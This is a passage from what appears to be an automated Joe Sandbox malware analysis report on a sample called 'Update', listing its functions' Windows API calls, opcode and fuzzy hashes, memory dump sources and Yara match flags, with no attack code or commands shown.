                                                                                            • Opcode Fuzzy Hash: bdb1bfae88507fc24ea2d34645f701010e180528540fa7e665a535b9b1700f45
                                                                                            • Instruction Fuzzy Hash: 281184B2A055697EE70527F68C89CAF79ACDE8A39C3100615F802D1640FB71DD168A76
                                                                                            Function 6C3807B0 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,-00000A64,?,00000000,?,6C380BAE,?), ref: 6C3807C6
                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?), ref: 6C380803
                                                                                            • WideCharToMultiByte.KERNEL32 ref: 6C380833
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 6C380862
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 626452242-0
                                                                                            • Opcode ID: 6f52055f335b49cac2601aa9d77ecf9a3746325c1a9f75aef191872c0089f151
                                                                                            • Instruction ID: 6e568be4309e948a5c8cbd6bb77e40516b42ec384285af3cf79ceff2dab390ef
                                                                                            • Opcode Fuzzy Hash: 6f52055f335b49cac2601aa9d77ecf9a3746325c1a9f75aef191872c0089f151
                                                                                            • Instruction Fuzzy Hash: 6F115BB17053043BF7205B619C09F6B3AACDB87778F200314F6685A6D0EB7565188AB2
                                                                                            Function 00914357 Relevance: 6.1, APIs: 4, Instructions: 70networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetLastError.KERNEL32(0000139F), ref: 009143C3
                                                                                              • Part of subcall function 00911377: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 009113A2
                                                                                              • Part of subcall function 00914C27: HeapFree.KERNEL32(?,00000000,?,00000000,00914E0C,?,0091429F,00914E0C,00000000,?,00000001,00914E0C,?), ref: 00914C4E
                                                                                            • SetLastError.KERNEL32(00000000,?), ref: 009143AE
                                                                                            • SetLastError.KERNEL32(00000057), ref: 009143D8
                                                                                            • WSAGetLastError.WS2_32(?), ref: 009143E7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Heap$AllocateFree
                                                                                            • String ID:
                                                                                            • API String ID: 2037364846-0
                                                                                            • Opcode ID: 127eb3da1a419b9376193c7e08546e54e028199608b7fbb35670fae08a1c63d3
                                                                                            • Instruction ID: fc25316536c47f9d6346362cd31ca0952a33b11a4b8410ec3394e45ce3015bbf
                                                                                            • Opcode Fuzzy Hash: 127eb3da1a419b9376193c7e08546e54e028199608b7fbb35670fae08a1c63d3
                                                                                            • Instruction Fuzzy Hash: 3311A736B0512CABD710EFA9A8845EEB7A8EB89332B0541A6ED1CD7200D735CD5146D0
                                                                                            Function 034E4380 Relevance: 6.1, APIs: 4, Instructions: 70networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetLastError.KERNEL32(0000139F), ref: 034E43EC
                                                                                              • Part of subcall function 034E13A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 034E13CB
                                                                                              • Part of subcall function 034E41E0: EnterCriticalSection.KERNEL32(034E4FB5,034E4E55,034E42BE,00000000,?,?,034E4E55,?,?,?,?,00000000,000000FF), ref: 034E41E8
                                                                                              • Part of subcall function 034E41E0: LeaveCriticalSection.KERNEL32(034E4FB5,?,?,?,00000000,000000FF), ref: 034E41F6
                                                                                              • Part of subcall function 034E4C70: HeapFree.KERNEL32(?,00000000,?,00000000,034E4E55,?,034E42C8,034E4E55,00000000,?,?,034E4E55,?), ref: 034E4C97
                                                                                            • SetLastError.KERNEL32(00000000,?), ref: 034E43D7
                                                                                            • SetLastError.KERNEL32(00000057), ref: 034E4401
                                                                                            • WSAGetLastError.WS2_32(?), ref: 034E4410
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave
                                                                                            • String ID:
                                                                                            • API String ID: 2060118545-0
                                                                                            • Opcode ID: 541203418dbcd5546b2ed17e46c5d224ab7cc371d38648be31095d6788807b2e
                                                                                            • Instruction ID: 8e737083ba983637d5645f10811513deb20d5639b07f107a16ddead8540b0219
                                                                                            • Opcode Fuzzy Hash: 541203418dbcd5546b2ed17e46c5d224ab7cc371d38648be31095d6788807b2e
                                                                                            • Instruction Fuzzy Hash: A011A73AB055189B9710EE7AF8849DFB7A8EF84323B0805ABEC0DDB300D631990146D5
                                                                                            Function 0091E5AE Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 0091E5BC
                                                                                              • Part of subcall function 00916E5A: __FF_MSGBANNER.LIBCMT ref: 00916E73
                                                                                              • Part of subcall function 00916E5A: __NMSG_WRITE.LIBCMT ref: 00916E7A
                                                                                              • Part of subcall function 00916E5A: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 00916E9F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 501242067-0
                                                                                            • Opcode ID: 19c8f705b293d0e43781c04c81f056510b7f67a69813665bbbd607d0321c1977
                                                                                            • Instruction ID: 36e3bd0bb823b9c621fde2d52378572710f286842487f33bc118b2c06ed8cc4b
                                                                                            • Opcode Fuzzy Hash: 19c8f705b293d0e43781c04c81f056510b7f67a69813665bbbd607d0321c1977
                                                                                            • Instruction Fuzzy Hash: 7C119432B0462EEADF216BB498047DA3AAAAB943A1F258525FD499A150DF35CCC08694
                                                                                            Function 034EDE70 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 034EDE93
                                                                                            • _free.LIBCMT ref: 034EDED5
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,034EDC95), ref: 034EDEFC
                                                                                            • HeapFree.KERNEL32(00000000), ref: 034EDF03
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Heap_free$FreeProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1072109031-0
                                                                                            • Opcode ID: b0ba92a2114bd1f53aeae73cf2d3a97d0796e7895943555e17a14895d3543787
                                                                                            • Instruction ID: 8d884d8a873dba48a28de597292f169ba5f5d932456267fa22d03871241d043d
                                                                                            • Opcode Fuzzy Hash: b0ba92a2114bd1f53aeae73cf2d3a97d0796e7895943555e17a14895d3543787
                                                                                            • Instruction Fuzzy Hash: 66118B71A00B009FD330DB69CC48F27B3AABB84701F18881DE58A8BB90D774F842CB95
                                                                                            Function 00913BC7 Relevance: 6.1, APIs: 4, Instructions: 58networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WSAEventSelect.WS2_32(00913A92,00000001,00000023), ref: 00913BD9
                                                                                            • WSAGetLastError.WS2_32 ref: 00913BE4
                                                                                            • send.WS2_32(00000001,00000000,00000000,00000000), ref: 00913C2F
                                                                                            • WSAGetLastError.WS2_32 ref: 00913C3A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$EventSelectsend
                                                                                            • String ID:
                                                                                            • API String ID: 259408233-0
                                                                                            • Opcode ID: 2fb520420096818f033348b16f08926af932f2b6a4c880f47cd01b5ee34dc08f
                                                                                            • Instruction ID: 0bc7d2c4190e4bec347a724d36d84abba323c25b74f8723c97bc0e7efe23dab9
                                                                                            • Opcode Fuzzy Hash: 2fb520420096818f033348b16f08926af932f2b6a4c880f47cd01b5ee34dc08f
                                                                                            • Instruction Fuzzy Hash: E51151B5700710ABD3209F79C8C8A97B6F9FBC8715B408A2DF996C7A50D736E940CB50
                                                                                            Function 034E3BF0 Relevance: 6.1, APIs: 4, Instructions: 58networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WSAEventSelect.WS2_32(?,034E3ABB,00000023), ref: 034E3C02
                                                                                            • WSAGetLastError.WS2_32 ref: 034E3C0D
                                                                                            • send.WS2_32(?,00000000,00000000,00000000), ref: 034E3C58
                                                                                            • WSAGetLastError.WS2_32 ref: 034E3C63
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$EventSelectsend
                                                                                            • String ID:
                                                                                            • API String ID: 259408233-0
                                                                                            • Opcode ID: e92b21e4403ab06c648ae1256be9977a561d4b457e40a5f2bb5ea709e519656e
                                                                                            • Instruction ID: 7a808c19a61ac3da439a05fba47c98d9431f55771d8380bfe81495d96f5fb359
                                                                                            • Opcode Fuzzy Hash: e92b21e4403ab06c648ae1256be9977a561d4b457e40a5f2bb5ea709e519656e
                                                                                            • Instruction Fuzzy Hash: F91191B66007109BD330DF79D888A57B6F9BB88715F000A2EF556CB750C731E4019B50
                                                                                            Function 0091F338 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                            • String ID:
                                                                                            • API String ID: 3016257755-0
                                                                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                            • Instruction ID: a46bf91740bf38d961047e939afa1d4c26fb90ef05eb23714e2d2b4e7eb292e0
                                                                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                            • Instruction Fuzzy Hash: 29114E3210414EBBCF165E84CC25DEE3F66BF58394B588925FE2859031D637C9B2AB81
                                                                                            Function 034FBDEB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                            • String ID:
                                                                                            • API String ID: 3016257755-0
                                                                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                            • Instruction ID: c20ea047b1c6d9b5d7229fb46d43a757241b2d780de931559cdde62f0f92332a
                                                                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                            • Instruction Fuzzy Hash: 1211283600024EBFCF169E85CC118AE3F66FB1A258B5C845AFB6859130C736C5B2AB95
                                                                                            Function 0305B7AA Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                            • String ID:
                                                                                            • API String ID: 3016257755-0
                                                                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                            • Instruction ID: add6f47d147bc26044d3e181abbf1a16fdeab33b9d6f43aafac03198dfe64f34
                                                                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                            • Instruction Fuzzy Hash: 38114B7640214EBBCF529E88CC51CEE7F66BB58250F488815FE5859130D636E5B2EB81
                                                                                            Function 034E41E0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EnterCriticalSection.KERNEL32(034E4FB5,034E4E55,034E42BE,00000000,?,?,034E4E55,?,?,?,?,00000000,000000FF), ref: 034E41E8
                                                                                            • LeaveCriticalSection.KERNEL32(034E4FB5,?,?,?,00000000,000000FF), ref: 034E41F6
                                                                                            • LeaveCriticalSection.KERNEL32(034E4FB5), ref: 034E4257
                                                                                            • SetEvent.KERNEL32(8520468B), ref: 034E4272
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$Leave$EnterEvent
                                                                                            • String ID:
                                                                                            • API String ID: 3394196147-0
                                                                                            • Opcode ID: 9d07ace92bf68be6d229d6fc66b797ba8564aca0cdb038d3e287e058f2214f26
                                                                                            • Instruction ID: 94da6b05934223f61e4d1a507d5fb730a037525c5b7fc2aec3773ffa8c62089c
                                                                                            • Opcode Fuzzy Hash: 9d07ace92bf68be6d229d6fc66b797ba8564aca0cdb038d3e287e058f2214f26
                                                                                            • Instruction Fuzzy Hash: 981103B0A01B059FD724DFB5D588A97B7E9BF48305F15896EE46E8B310EB31E806CB00
                                                                                            Function 034E4B00 Relevance: 6.0, APIs: 4, Instructions: 45timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • timeGetTime.WINMM(00000001,?,00000001,?,034E3C4F,?,?,00000001), ref: 034E4B15
                                                                                            • InterlockedIncrement.KERNEL32(00000001), ref: 034E4B24
                                                                                            • InterlockedIncrement.KERNEL32(00000001), ref: 034E4B31
                                                                                            • timeGetTime.WINMM(?,034E3C4F,?,?,00000001), ref: 034E4B48
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: IncrementInterlockedTimetime
                                                                                            • String ID:
                                                                                            • API String ID: 159728177-0
                                                                                            • Opcode ID: 93d6ca29f6c80c310c57ef8b2798f736f028843557b3ffff504d64039156cc3a
                                                                                            • Instruction ID: 2edd4bf3294c20c857431fdfcadfd6292eda233d543914fc9628ee219a3a96c3
                                                                                            • Opcode Fuzzy Hash: 93d6ca29f6c80c310c57ef8b2798f736f028843557b3ffff504d64039156cc3a
                                                                                            • Instruction Fuzzy Hash: CA01DAB56007059FC720EFBAD88098AFBFCAF58654700892FE549C7710E775E5458FA4
                                                                                            Function 034E3660 Relevance: 6.0, APIs: 4, Instructions: 42timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 034E3667
                                                                                            • _free.LIBCMT ref: 034E369C
                                                                                              • Part of subcall function 034EF639: RtlFreeHeap.NTDLL(00000000,00000000,?,034F3E4C,00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76), ref: 034EF64F
                                                                                              • Part of subcall function 034EF639: GetLastError.KERNEL32(00000000,?,034F3E4C,00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76,00000000), ref: 034EF661
                                                                                            • _malloc.LIBCMT ref: 034E36D7
                                                                                            • _memset.LIBCMT ref: 034E36E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                            • String ID:
                                                                                            • API String ID: 3340475617-0
                                                                                            • Opcode ID: 9e95e090e64f875a3a7f2b0d04cab41c740c2a72d686abc7598889a541f98e8d
                                                                                            • Instruction ID: 7fbc1adfc2693a484fc7ac40dcb898bd46526ac27dd0d83c569e340f42a059b4
                                                                                            • Opcode Fuzzy Hash: 9e95e090e64f875a3a7f2b0d04cab41c740c2a72d686abc7598889a541f98e8d
                                                                                            • Instruction Fuzzy Hash: 170108B4900B009FE360DF7A8881B97BAE8EB85205F05482ED5AE8B311D630A8058F24
                                                                                            Function 00916EEE Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 00916F08
                                                                                              • Part of subcall function 00916E5A: __FF_MSGBANNER.LIBCMT ref: 00916E73
                                                                                              • Part of subcall function 00916E5A: __NMSG_WRITE.LIBCMT ref: 00916E7A
                                                                                              • Part of subcall function 00916E5A: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 00916E9F
                                                                                            • std::exception::exception.LIBCMT ref: 00916F3D
                                                                                            • std::exception::exception.LIBCMT ref: 00916F57
                                                                                            • __CxxThrowException@8.LIBCMT ref: 00916F68
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 615853336-0
                                                                                            • Opcode ID: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                                            • Instruction ID: 3bc70f7f974a3b11ccc204d17f0434f9a1024a5be0fb37304dc6f3f41e879bf8
                                                                                            • Opcode Fuzzy Hash: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                                            • Instruction Fuzzy Hash: 20F0F435A0425DA6EB00EBA4DC85AED7AFAEB81304F140059F4249A1D2DFB1CAC28750
                                                                                            Function 0304F0C6 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 0304F0E0
                                                                                              • Part of subcall function 0304F032: __FF_MSGBANNER.LIBCMT ref: 0304F04B
                                                                                              • Part of subcall function 0304F032: __NMSG_WRITE.LIBCMT ref: 0304F052
                                                                                            • std::exception::exception.LIBCMT ref: 0304F115
                                                                                            • std::exception::exception.LIBCMT ref: 0304F12F
                                                                                            • __CxxThrowException@8.LIBCMT ref: 0304F140
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 2388904642-0
                                                                                            • Opcode ID: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                            • Instruction ID: 6554c2a48f0a2c581904feb2a2c04298722ea1f92f23d2ee4a759581fce77c84
                                                                                            • Opcode Fuzzy Hash: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                            • Instruction Fuzzy Hash: CDF028B5802316ABDB15EB94DC14EFF7BADEBC0644F944078E800AA0D0CB75CB02CB41
                                                                                            Function 034ECD80 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 034E1420: HeapFree.KERNEL32(?,00000000,?,?,?,034E40B1,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E143D
                                                                                              • Part of subcall function 034E1420: _free.LIBCMT ref: 034E1459
                                                                                            • HeapDestroy.KERNEL32(00000000), ref: 034ECD93
                                                                                            • HeapCreate.KERNEL32(?,?,?), ref: 034ECDA5
                                                                                            • _free.LIBCMT ref: 034ECDB5
                                                                                            • HeapDestroy.KERNEL32 ref: 034ECDE2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Heap$Destroy_free$CreateFree
                                                                                            • String ID:
                                                                                            • API String ID: 4097506873-0
                                                                                            • Opcode ID: b9c07f2ed3e6b15393e9e8e7898e6fd182bc66f492ab6b1ffb3f2a5abac870d4
                                                                                            • Instruction ID: dbbe25cbd7b00189051b8de067a891fdbd1d6c77496ebd485e56bb9cd8425ecf
                                                                                            • Opcode Fuzzy Hash: b9c07f2ed3e6b15393e9e8e7898e6fd182bc66f492ab6b1ffb3f2a5abac870d4
                                                                                            • Instruction Fuzzy Hash: 56F019B91007029BD320DF65E848B57FBA8AF84615F144919E8598B750D735E856CB90
                                                                                            Function 6C3A0A88 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadConsoleInputW.KERNEL32(0000000C,6C3B9D90,6C393444,00000000,?,6C3934C8,00000000,00000001,?,6C3B9DB0,00000038,6C393444,6C3B9D90,0000000C,6C371B30), ref: 6C3A0A9D
                                                                                            • GetLastError.KERNEL32(?,6C3934C8,00000000,00000001,?,6C3B9DB0,00000038,6C393444,6C3B9D90,0000000C,6C371B30), ref: 6C3A0AA9
                                                                                              • Part of subcall function 6C3A0C1D: CloseHandle.KERNEL32(FFFFFFFF,6C3A0B05,?,6C3936DC,0000000C,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0C2D
                                                                                            • ___initconin.LIBCMT ref: 6C3A0AB9
                                                                                              • Part of subcall function 6C3A0BFE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6C3A0A79,6C3936CB,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0C11
                                                                                            • ReadConsoleInputW.KERNEL32(0000000C,6C3B9D90,6C393444,?,6C3934C8,00000000,00000001,?,6C3B9DB0,00000038,6C393444,6C3B9D90,0000000C,6C371B30), ref: 6C3A0ACD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleInputRead$CloseCreateErrorFileHandleLast___initconin
                                                                                            • String ID:
                                                                                            • API String ID: 838051604-0
                                                                                            • Opcode ID: 3f1330d813a0e4b99f36dd5e8eb7599d913511fb91d3061712787db5d8c57dc6
                                                                                            • Instruction ID: 3774c5b3c723eb46bbc200c23c0c170046e35cfea561cc9e48af19e2badb441b
                                                                                            • Opcode Fuzzy Hash: 3f1330d813a0e4b99f36dd5e8eb7599d913511fb91d3061712787db5d8c57dc6
                                                                                            • Instruction Fuzzy Hash: A5F06536501058BBCF122FD5CC04AD93F7AFB4A3647054150FA29A6120CB32C930DFD5
                                                                                            Function 6C3A0ADA Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetNumberOfConsoleInputEvents.KERNEL32(?,?,?,6C3936DC,0000000C,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0AE9
                                                                                            • GetLastError.KERNEL32(?,6C3936DC,0000000C,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0AF5
                                                                                              • Part of subcall function 6C3A0C1D: CloseHandle.KERNEL32(FFFFFFFF,6C3A0B05,?,6C3936DC,0000000C,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0C2D
                                                                                            • ___initconin.LIBCMT ref: 6C3A0B05
                                                                                              • Part of subcall function 6C3A0BFE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6C3A0A79,6C3936CB,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0C11
                                                                                            • GetNumberOfConsoleInputEvents.KERNEL32(?,?,6C3936DC,0000000C,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0B13
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
